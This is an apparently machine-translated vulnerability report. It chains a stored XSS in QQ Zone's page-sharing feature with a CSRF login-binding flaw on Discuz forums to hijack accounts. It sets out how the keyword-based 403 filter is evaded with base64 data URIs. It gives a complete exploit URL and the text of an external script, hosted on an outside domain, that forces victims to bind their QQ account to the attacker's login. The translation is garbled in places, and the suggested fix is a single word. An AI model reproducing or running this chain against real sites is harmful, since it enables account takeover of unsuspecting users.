Use the QQ space storage XSS vulnerability with the CSRF vulnerability to hijack other website accounts (sensitive tag 403 interception can bypass \ 403 bypass)
1. All tests are from the fuzz test (all are determined based on the returned content. If any judgment error occurs, sorry)
2. the XSS output point is not filtered. However, if a sensitive tag keyword is entered, the Server Returns Error 403, but it is not strict.
3. Others say that the title is too long and big.
(Method of exploits already supplemented)
1. When sharing web pages in the QQ space, which of the following? The url parameter does not filter double quotation marks,
①.
②.
2. Although this parameter is not filtered, as long as you enter some tag that triggers the event, the system will prompt 403, and the page will be blank. For example, if I enter this parameter, it will become inaccessible,
">
<
3. If some normal labels are entered and the JS script is not triggered, it will not be blocked. The test code includes
------------ → intercept ------------ → No intercept <script/src =" // 11 "> ------------ → intercept <scr/src = "// 11 "> ------------ → do not intercept <iframe/src =" // 11 "> ------------ → intercept <if/src =" // 11 "> ------------ → do not intercept <a/href = "javascript: alert (/1/) "> ---- intercept
4. we have tested a lot below and listed these items. From the above, we can see that they are intercepted Based on keywords 5. however, when <a/href = "data: text/html; base64, XXXXXX"> is tested, it is divided into two types: ①. in the first case, <br>: <a/href = "data: text/html; base64, data: text/html; base64, PGJyPg = "> aaa </a> -------------- → do not intercept ② the second case, :< a href = "data: text/html; base64, pgltzy9zcm9ijeil29uzxjyb3i9imfszxj0kc8xlykipg = "> aaa </a> ------------- → intercept 6. in this case, you can combine the first case with the second case. <Br> it can be passed. If the <br> encoding is carried with the encoding, is it possible to pass 403 ??? So the following test <br> encoding (encoding) encoding = equals (encode the last equals sign because there cannot be an equal sign in the url) pgjypjxpbwcvc3jpsixii9vbmvycm9ypsjhbgvydcgvms8pij4 % 3d 7. however, it does not intercept 8. submit it and try to view the Space Code 9. click it and try 10 in the window. check the source and it turns out that it was popped up from the QQ space. however, this is too small. It is generally difficult for people to click here. You can add a CSS style to enlarge the XSS point. The XSS point has been zoomed in through the CSS style, you can see the connection wherever you move the mouse. The red letter marks 12. then the reviewer said that the method of exploits is required. when I submitted this vulnerability, I said that the login connection will prompt 403 when you click to jump from another website. However, the local jump from the QQ chat window and QQ space will not be blocked, and then I will see Figure 14. although this XSS is not in the qq.com domain, you can see that referer is in the QQ space. It indicates that you can enable the logon connection. That is to say, the last vulnerability can be exploited in this vulnerability. figure 1. Use of the following tests. first construct the Code <br> <script/src =" http://guanggao456.sinaapp.com/1.js "> </Script>
Encode (Base64 encoding + url encoding)
2.
PGJyPjxzY3JpcHQvc3JjPSJodHRwOi8vZ3VhbmdnYW80NTYuc2luYWFwcC5jb20vMS5qcyI%2bPC9zY3JpcHQ%2b
Bytes
3. Get the connection to the shared web page, publish it to the space, and embed it directly into the personal center of the space.
http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=http%3A%2F%2Fdonghua.dmzj.com%2F%23%22%3E%3Ca/href%3d%22data:text/html;base64,PGJyPjxzY3JpcHQvc3JjPSJodHRwOi8vZ3VhbmdnYW80NTYuc2luYWFwcC5jb20vMS5qcyI%2bPC9zY3JpcHQ%2b%22style%3d%22left:0px;top:%200px;%20width:%20100%25;%20height:%20100%25;%20position:%20fixed;%22&title=%E5%BE%88%E4%B9%85%E5%BE%88%E4%B9%85%E6%A0%B9%E6%8D%AE%E5%9B%BD%E5%AE%B6%E6%A0%B9%E6%8D%AE%E5%9B%BD%E5%AE%B6&desc=&summary=&site=
4. The code in http://guanggao456.sinaapp.com/1.jsis
Window. onload = function aa () {window. open ("xxxxxxxxxxxxxxxxx")}; // enter your logon connection here. In order to allow others' computers to log on to your account function bb () {var e = document. createElement ('iframe'); e. setAttribute ('src', 'HTTP: // www.discuz.net/connect.php? Mod = login & op = init & type = loginbind & referer = home. php? Mod = spacecp & ac = plugin & id = qqconnect: spacecp '); document. body. appendChild (e) ;}; setTimeout ("bb ()", 2000) // a 2-second delay to open the bound connection of the Discuz community
5. the above code is used together to zoom in the personal status of the XSS point in the space and fill the entire screen. Then, when the user enters his/her personal center to view the status, the mouse will surely be clicked, then XSS runs. window. open: open the configured logon connection, and then wait for two seconds to create an iframe to open the connection to the QQ account bound to the Discuz community, and then ...........................
Bytes --------------------------------------------------------------------------------------------
6. Test Images
1. You can see CSS to enlarge the XSS point to full screen.
2. When a user clicks blind spots in the space, XSS triggers the attack. First, open my login connection and start to countdown to the bound account.
2. Access the connection and share a webpage.
http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=http%3A%2F%2Fdonghua.dmzj.com%2F%23%22%3E%3Ca/href%3d%22data:text/html;base64,PGJyPjxzY3JpcHQvc3JjPSJodHRwOi8vZ3VhbmdnYW80NTYuc2luYWFwcC5jb20vMS5qcyI%2bPC9zY3JpcHQ%2b%22style%3d%22left:0px;top:%200px;%20width:%20100%25;%20height:%20100%25;%20position:%20fixed;%22&title=%E5%BE%88%E4%B9%85%E5%BE%88%E4%B9%85%E6%A0%B9%E6%8D%AE%E5%9B%BD%E5%AE%B6%E6%A0%B9%E6%8D%AE%E5%9B%BD%E5%AE%B6&desc=&summary=&site=
Here, the content of http://guanggao456.sinaapp.com/1.js?is
Window. onload = function aa () {window. open ("xxxxxxxxxxxxxxxxx")}; // enter your logon connection here. In order to allow others' computers to log on to your account function bb () {var e = document. createElement ('iframe'); e. setAttribute ('src', 'HTTP: // www.discuz.net/connect.php? Mod = login & op = init & type = loginbind & referer = home. php? Mod = spacecp & ac = plugin & id = qqconnect: spacecp '); document. body. appendChild (e) ;}; setTimeout ("bb ()", 2000) // a 2-second delay to open the bound connection of the Discuz community
Solution:
Filter